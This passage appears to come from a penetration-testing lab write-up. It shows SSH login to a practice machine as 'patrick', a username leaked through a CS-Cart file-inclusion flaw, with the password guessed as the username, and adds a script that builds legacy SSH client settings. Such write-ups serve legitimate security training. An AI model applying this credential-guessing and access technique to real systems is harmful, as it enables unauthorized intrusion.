SSH
A username was disclosed through the LFI vulnerability identified in the target CS-Cart instance.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/payday]
└─$ sshpass -p patrick ssh patrick@$IP
Unable to negotiate with 192.168.116.39 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss
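The target SSH server only offers the ssh-rsa and ssh-dss host key types, so one of them has to be enabled explicitly on the client with HostKeyAlgorithms.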
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/payday]
└─$ sshpass -p patrick ssh patrick@$IP -o HostKeyAlgorithms=+ssh-rsa
Linux payday 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Sun Feb 9 09:19:32 2025 from 192.168.45.215
patrick@payday:~$ whoami
patrick
patrick@payday:~$ hostname
payday
patrick@payday:~$ ipconfig
-bash: ipconfig: command not found
patrick@payday:~$ ifconfig
eth0 Link encap:Ethernet HWaddr 00:50:56:9E:B2:F4
inet addr:192.168.116.39 Bcast:192.168.116.255 Mask:255.255.255.0
inet6 addr: fe80::250:56ff:fe9e:b2f4/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:37768 errors:1 dropped:1 overruns:0 frame:0
TX packets:22161 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2984258 (2.8 MB) TX bytes:2142032 (2.0 MB)
Interrupt:17 Base address:0x2000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:503 errors:0 dropped:0 overruns:0 frame:0
TX packets:503 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:682031 (666.0 KB) TX bytes:682031 (666.0 KB)
Initial foothold established on the target system as the patrick user via SSH.
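The negotiation error above names both the algorithm class that failed and the server's offer, which is enough to build an ssh_config entry scoped to this one host instead of passing -o on every command. The sketch below is an added example, not part of the original notes; it generalizes from the host key case to the key exchange, cipher and MAC variants of the same OpenSSH message. The function name legacy_ssh_stanza is hypothetical, and it assumes the local client still supports the first algorithm offered (check with ssh -Q).

```shell
#!/bin/sh
# Added example (not from the original notes): turn an OpenSSH
# "Unable to negotiate" error into an ssh_config stanza scoped to one host.
# legacy_ssh_stanza is a hypothetical helper name.
legacy_ssh_stanza() {
    line=$1
    # Message shape printed by the OpenSSH client:
    #   Unable to negotiate with <host> port <n>: no matching <what> found. Their offer: <a,b,...>
    case $line in
        "Unable to negotiate with "*": no matching "*" found. Their offer: "*) ;;
        *) return 1 ;;
    esac
    host=${line#"Unable to negotiate with "}
    host=${host%%" port "*}
    what=${line#*": no matching "}
    what=${what%%" found. Their offer: "*}
    offer=${line##*"Their offer: "}
    first=${offer%%,*}          # first algorithm the server offered

    # ssh_config keyword that governs the class that failed to negotiate.
    case $what in
        "host key type")       keyword=HostKeyAlgorithms ;;
        "key exchange method") keyword=KexAlgorithms ;;
        cipher)                keyword=Ciphers ;;
        MAC)                   keyword=MACs ;;
        *) return 2 ;;
    esac

    # The offer is text chosen by the remote server: accept only characters
    # that occur in algorithm names and addresses before emitting config.
    case $first in ''|*[!A-Za-z0-9@._+-]*) return 3 ;; esac
    case $host  in ''|*[!A-Za-z0-9.:_-]*)  return 3 ;; esac

    # "+" appends to the client's defaults instead of replacing them.
    printf 'Host %s\n    %s +%s\n' "$host" "$keyword" "$first"
}

# Demo on the error line shown in the session above.
legacy_ssh_stanza "Unable to negotiate with 192.168.116.39 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss"
```

Appending the printed stanza to ~/.ssh/config limits the legacy algorithm to that host and leaves the client defaults untouched for every other connection.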